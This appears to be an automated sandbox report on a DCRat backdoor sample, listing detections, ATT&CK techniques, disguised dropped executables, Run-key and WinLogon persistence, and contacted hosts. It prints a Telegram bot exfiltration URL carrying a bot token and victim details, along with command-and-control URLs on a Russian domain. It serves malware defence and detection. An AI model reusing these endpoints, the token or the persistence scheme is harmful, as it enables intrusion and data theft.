Source: Yara match	File source: 00000032.00000002.3211729351.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.2800446786.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000002.3211729351.0000000003190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.2613445983.00000000024E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.2703597080.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2448716973.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.2613445983.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2362007456.0000000002CED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kQyd2z80gD.exe PID: 6780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dLErkomWRcaRguaKAMtYMnt.exe PID: 5708, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dLErkomWRcaRguaKAMtYMnt.exe PID: 2568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SearchApp.exe PID: 5644, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SearchApp.exe PID: 1252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WmiPrvSE.exe PID: 5804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WmiPrvSE.exe PID: 4568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dLErkomWRcaRguaKAMtYMnt.exe PID: 7960, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WmiPrvSE.exe PID: 8076, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SearchApp.exe PID: 8168, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dLErkomWRcaRguaKAMtYMnt.exe PID: 6696, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WmiPrvSE.exe PID: 7752, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SearchApp.exe PID: 7956, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dLErkomWRcaRguaKAMtYMnt.exe PID: 3536, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WmiPrvSE.exe PID: 7984, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SearchApp.exe PID: 7972, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dLErkomWRcaRguaKAMtYMnt.exe PID: 5688, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WmiPrvSE.exe PID: 7628, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SearchApp.exe PID: 8096, type: MEMORYSTR
Source: Yara match	File source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\SearchApp.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\WmiPrvSE.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	21 Registry Run Keys / Startup Folder	12 Process Injection	111 Masquerading	OS Credential Dumping	1 Query Registry	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	21 Registry Run Keys / Startup Folder	11 Disable or Modify Tools	LSASS Memory	21 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	131 Virtualization/Sandbox Evasion	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Process Injection	NTDS	131 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	114 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Obfuscated Files or Information	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Software Packing	DCSync	1 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	114 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
kQyd2z80gD.exe	82%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
kQyd2z80gD.exe	100%	Avira	HEUR/AGEN.1310064
kQyd2z80gD.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	100%	Avira	HEUR/AGEN.1310064
C:\Recovery\WmiPrvSE.exe	100%	Avira	HEUR/AGEN.1310064
C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	100%	Avira	HEUR/AGEN.1310064
C:\Recovery\SearchApp.exe	100%	Avira	HEUR/AGEN.1310064
C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	100%	Joe Sandbox ML
C:\Recovery\WmiPrvSE.exe	100%	Joe Sandbox ML
C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	100%	Joe Sandbox ML
C:\Recovery\SearchApp.exe	100%	Joe Sandbox ML
C:\Recovery\SearchApp.exe	82%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Recovery\WmiPrvSE.exe	82%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	82%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe	82%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat

Source	Detection	Scanner	Label
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
cm36861.tw1.ru	92.53.106.114	true	true	unknown
ipinfo.io	34.117.59.81	true	false	unknown
api.telegram.org	149.154.167.220	true	true	unknown

Contacted URLs

Name	Malicious	Reputation
https://api.telegram.org/bot7362674374:AAHc4bvqtak0iH1wK9oJ4m5BCQ5eSxckDy4/sendPhoto?chat_id=https://t.me/vavaaffBOT&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%20c81b040e0acd70ade6f5665d2ebc227f233d835d%0A%E2%80%A2%20Comment%3A%20%0A%0A%E2%80%A2%20User%20Name%3A%20user%0A%E2%80%A2%20PC%20Name%3A%20040965%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20173.254.250.71%0A%E2%80%A2%20GEO%3A%20US%20%2F%20Dallas%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CRecovery%5CdLErkomWRcaRguaKAMtYMnt.exe	false	unknown
http://cm36861.tw1.ru/@=M2MiBTN3ImM	true	unknown
http://cm36861.tw1.ru/2b750b3c.php?Htuc=04FW5e1D7gwHOLZmIUeH86Hd8X1BJW&6Y=n1I1G72yRqMJwlPc9ZQ&3b482a1504ac77c5c43f7e15a2187b43=9f54798b89eb404995a9b7978336a5b8&c3f24358aa290547facbfb1d35d51e12=gN5QDZjZzMmJGZ0Y2NjFTZihjMxcTYmNTNkRDO4IWZlRGOwE2YyIDO&Htuc=04FW5e1D7gwHOLZmIUeH86Hd8X1BJW&6Y=n1I1G72yRqMJwlPc9ZQ	true	unknown
https://ipinfo.io/json	false	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://cm36861.tw1.ru/2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d528	dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.00000000027CB000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://ipinfo.io/missingauth	dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.0000000002AE3000.00000004.00000800.00020000.00000000.sdmp, dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.00000000025CC000.00000004.00000800.00020000.00000000.sdmp, dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.0000000002ADF000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000011.00000002.3094117080.000002A2C909D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.3046812715.000001DB2A1F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3107519937.0000028E5E320000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3010091850.0000020690070000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.microsoft.coG	powershell.exe, 00000018.00000002.3368189544.00000206ED542000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ipinfo.io/json8	dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.0000000002AA2000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://ns.ad0/g/imj	dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3624828195.000000001CC19000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://t.me/vavaaffBOT	kQyd2z80gD.exe, 00000000.00000002.2124507684.00000000026D1000.00000004.00000800.00020000.00000000.sdmp, dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.00000000024F8000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://api.telegram.org	dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.00000000025FC000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000001A.00000002.2245302870.000001B136E18000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot	dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.00000000025D0000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000011.00000002.2244941047.000002A2B91B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2243755724.000001DB1A3A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2244948094.0000028E4E4D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2250434274.0000020558158000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2241815958.0000020680229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2245302870.000001B136E18000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000001A.00000002.2245302870.000001B136E18000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://.AppV.UG	powershell.exe, 00000016.00000002.3369230772.0000020570453000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://ipinfo.io	dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.0000000002AA2000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://contoso.com/License	powershell.exe, 00000018.00000002.3010091850.0000020690070000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000018.00000002.3010091850.0000020690070000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ns.adobt/pg/j	dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3624828195.000000001CC19000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://cm36861.tw1.ru	dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.00000000027CB000.00000004.00000800.00020000.00000000.sdmp	true		unknown
http://cm36861.tw1.ru/	dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.00000000024F8000.00000004.00000800.00020000.00000000.sdmp	true		unknown
https://t.me/vavaaffBOT&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%20c81b0	dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.0000000002608000.00000004.00000800.00020000.00000000.sdmp, dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.00000000025FC000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://github.com/Pester/Pester	powershell.exe, 0000001A.00000002.2245302870.000001B136E18000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://ipinfo.io	dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.0000000002AA2000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://go.microsof	powershell.exe, 00000016.00000002.3108452537.0000020567FFD000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://crl.microso	powershell.exe, 00000016.00000002.3376842814.00000205704C7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://ns.photo/j	dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3624828195.000000001CC19000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://api.telegram.org/bot7362674374:AAHc4bvqtak0iH1wK9oJ4m5BCQ5eSxckDy4/sendPhoto?chat_id=https:/	dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.00000000025D0000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000011.00000002.2244941047.000002A2B91B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2243755724.000001DB1A3A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2244948094.0000028E4E4D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2250434274.0000020558158000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2241815958.0000020680229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2245302870.000001B136E18000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000018.00000002.3010091850.0000020690070000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000011.00000002.3094117080.000002A2C9000000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.3046812715.000001DB2A1F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3107519937.0000028E5E320000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3010091850.0000020690070000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ipinfo.io/miss	dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.0000000002AE3000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://aka.ms/pscore68	powershell.exe, 00000011.00000002.2244941047.000002A2B8F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2243755724.000001DB1A181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2244948094.0000028E4E2B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2250434274.0000020557F31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2241815958.0000020680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2245302870.000001B136C02000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ipinfo.i	dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.0000000002AE3000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://api.telegram.org	dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.00000000025FC000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	kQyd2z80gD.exe, 00000000.00000002.2124507684.00000000026D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2244941047.000002A2B8F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2243755724.000001DB1A181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2244948094.0000028E4E2B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2250434274.0000020557F31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2241815958.0000020680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2245302870.000001B136C02000.00000004.00000800.00020000.00000000.sdmp, dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.00000000024F8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ns.a1.0/auj	dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3624828195.000000001CC19000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ipinfo.ioC5wbmc=	dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.00000000024F8000.00000004.00000800.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
34.117.59.81	ipinfo.io	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
92.53.106.114	cm36861.tw1.ru	Russian Federation	9123	TIMEWEB-ASRU	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1541137
Start date and time:	2024-10-24 13:56:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	52
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	kQyd2z80gD.exe renamed because original name is a hash value
Original Sample Name:	4A3BF58E23A86EA73D2F1D8BA04E7467.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@40/41@3/3
EGA Information:	Failed
HCA Information:	Successful, ratio: 78% Number of executed functions: 409 Number of non-executed functions: 28
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, schtasks.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target SearchApp.exe, PID 1252 because it is empty
Execution Graph export aborted for target SearchApp.exe, PID 5644 because it is empty
Execution Graph export aborted for target SearchApp.exe, PID 7956 because it is empty
Execution Graph export aborted for target SearchApp.exe, PID 7972 because it is empty
Execution Graph export aborted for target SearchApp.exe, PID 8096 because it is empty
Execution Graph export aborted for target SearchApp.exe, PID 8168 because it is empty
Execution Graph export aborted for target WmiPrvSE.exe, PID 4568 because it is empty
Execution Graph export aborted for target WmiPrvSE.exe, PID 5804 because it is empty
Execution Graph export aborted for target WmiPrvSE.exe, PID 7628 because it is empty
Execution Graph export aborted for target WmiPrvSE.exe, PID 7752 because it is empty
Execution Graph export aborted for target WmiPrvSE.exe, PID 7984 because it is empty
Execution Graph export aborted for target WmiPrvSE.exe, PID 8076 because it is empty
Execution Graph export aborted for target dLErkomWRcaRguaKAMtYMnt.exe, PID 2568 because it is empty
Execution Graph export aborted for target dLErkomWRcaRguaKAMtYMnt.exe, PID 3536 because it is empty
Execution Graph export aborted for target dLErkomWRcaRguaKAMtYMnt.exe, PID 5688 because it is empty
Execution Graph export aborted for target dLErkomWRcaRguaKAMtYMnt.exe, PID 5708 because it is empty
Execution Graph export aborted for target dLErkomWRcaRguaKAMtYMnt.exe, PID 6696 because it is empty
Execution Graph export aborted for target dLErkomWRcaRguaKAMtYMnt.exe, PID 7064 because it is empty
Execution Graph export aborted for target dLErkomWRcaRguaKAMtYMnt.exe, PID 7960 because it is empty
Execution Graph export aborted for target kQyd2z80gD.exe, PID 6780 because it is empty
Execution Graph export aborted for target powershell.exe, PID 2316 because it is empty
Execution Graph export aborted for target powershell.exe, PID 348 because it is empty
Execution Graph export aborted for target powershell.exe, PID 4028 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6300 because it is empty
Execution Graph export aborted for target powershell.exe, PID 984 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: kQyd2z80gD.exe

Simulations

Behavior and APIs

Time	Type	Description
07:57:06	API Interceptor	2725063x Sleep call for process: dLErkomWRcaRguaKAMtYMnt.exe modified
07:57:06	API Interceptor	154x Sleep call for process: powershell.exe modified
13:57:04	Task Scheduler	Run new task: dLErkomWRcaRguaKAMtYMnt path: "C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe"
13:57:04	Task Scheduler	Run new task: dLErkomWRcaRguaKAMtYMntd path: "C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe"
13:57:05	Task Scheduler	Run new task: SearchApp path: "C:\Recovery\SearchApp.exe"
13:57:05	Task Scheduler	Run new task: SearchAppS path: "C:\Recovery\SearchApp.exe"
13:57:05	Task Scheduler	Run new task: WmiPrvSE path: "C:\Recovery\WmiPrvSE.exe"
13:57:05	Task Scheduler	Run new task: WmiPrvSEW path: "C:\Recovery\WmiPrvSE.exe"
13:57:08	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run dLErkomWRcaRguaKAMtYMnt "C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe"
13:57:16	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\Recovery\WmiPrvSE.exe"
13:57:24	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SearchApp "C:\Recovery\SearchApp.exe"
13:57:33	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run dLErkomWRcaRguaKAMtYMnt "C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe"
13:57:42	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\Recovery\WmiPrvSE.exe"
13:57:50	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SearchApp "C:\Recovery\SearchApp.exe"
13:57:59	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run dLErkomWRcaRguaKAMtYMnt "C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe"
13:58:07	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\Recovery\WmiPrvSE.exe"
13:58:15	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run SearchApp "C:\Recovery\SearchApp.exe"
13:58:32	Autostart	Run: WinLogon Shell "C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe"
13:58:40	Autostart	Run: WinLogon Shell "C:\Recovery\WmiPrvSE.exe"
13:58:49	Autostart	Run: WinLogon Shell "C:\Recovery\SearchApp.exe"
13:58:57	Autostart	Run: WinLogon Shell "C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	REVISED INVOICE.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Produccion.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	226999705-124613-sanlccjavap0004-67.exe	Get hash	malicious	Snake Keylogger	Browse
	BT-036016002U_RFQ 014-010-02024.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	RFQ_64182MR_PDF.R00.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Circular_no_088_Annexure_pdf.html	Get hash	malicious	HTMLPhisher	Browse
	RTGS_UCB_DCCB_docx.html	Get hash	malicious	HTMLPhisher	Browse
	WBPWLAj09q.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	Adeleidae.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	rRFQNO-N__MERODOPEDIDO106673.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
34.117.59.81	UjbjOP.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	I9xuKI2p2B.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	licarisan_api.exe	Get hash	malicious	Icarus	Browse	ipinfo.io/ip
	build.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/ip
	YjcgpfVBcm.bat	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	lePDF.cmd	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	6Mpsoq1.php.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	mjOiDa1hrN.bat	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	8ym4cxJPyl.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	GKrKPXOkdF.zsb.dll	Get hash	malicious	Unknown	Browse	ipinfo.io/json
92.53.106.114	jD1RqkyUNm.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	cb62343.tw1.ru/ProviderpythonjsBigloadFlowertemp.php
92.53.106.114	http://cl41155.tw1.ru/clients/	Get hash	malicious	Unknown	Browse	cl41155.tw1.ru/clients/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ipinfo.io	sgc0e7HpH5.exe	Get hash	malicious	Unknown	Browse	34.117.59.81
	uHaQ34KPq5.exe	Get hash	malicious	Unknown	Browse	34.117.59.81
	wOP5sowoN1.exe	Get hash	malicious	Unknown	Browse	34.117.59.81
	oD0N44Ka53.exe	Get hash	malicious	Unknown	Browse	34.117.59.81
	sgc0e7HpH5.exe	Get hash	malicious	Unknown	Browse	34.117.59.81
	uHaQ34KPq5.exe	Get hash	malicious	Unknown	Browse	34.117.59.81
	F1NlcL6Ly7.exe	Get hash	malicious	Unknown	Browse	34.117.59.81
	SecuriteInfo.com.Trojan-PSW.Win32.Stealer.cjar.14389.14563.exe	Get hash	malicious	Unknown	Browse	34.117.59.81
	SecuriteInfo.com.Trojan-PSW.Win32.Stealer.cjar.14389.14563.exe	Get hash	malicious	Unknown	Browse	34.117.59.81
	R8zKsetGjK.exe	Get hash	malicious	Unknown	Browse	34.117.59.81
api.telegram.org	REVISED INVOICE.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Produccion.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	226999705-124613-sanlccjavap0004-67.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	BT-036016002U_RFQ 014-010-02024.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
